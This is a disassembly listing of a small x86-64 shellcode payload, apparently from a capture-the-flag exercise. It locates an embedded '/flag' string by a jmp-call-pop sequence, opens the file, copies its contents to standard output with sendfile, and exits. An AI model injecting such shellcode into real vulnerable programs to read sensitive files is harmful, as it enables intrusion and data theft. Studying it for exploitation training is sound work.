   0:   eb 3f                   jmp    0x41
   2:   59                      pop    rcx
   3:   51                      push   rcx
   4:   48 c7 c0 02 00 00 00    mov    rax, 0x2
   b:   48 89 e7                mov    rdi, rsp
   e:   48 c7 c6 00 00 00 00    mov    rsi, 0x0
  15:   0f 05                   syscall 
  17:   48 c7 c7 01 00 00 00    mov    rdi, 0x1
  1e:   48 89 c6                mov    rsi, rax
  21:   48 c7 c2 00 00 00 00    mov    rdx, 0x0
  28:   49 c7 c2 e8 03 00 00    mov    r10, 0x3e8
  2f:   48 c7 c0 28 00 00 00    mov    rax, 0x28
  36:   0f 05                   syscall 
  38:   48 c7 c0 3c 00 00 00    mov    rax, 0x3c
  3f:   0f 05                   syscall 
  41:   e8 bc ff ff ff          call   0x2
  46:   2f                      (bad)  
  47:   66 6c                   data16 ins BYTE PTR es:[rdi], dx
  49:   61                      (bad)  
  4a:   67                      addr32
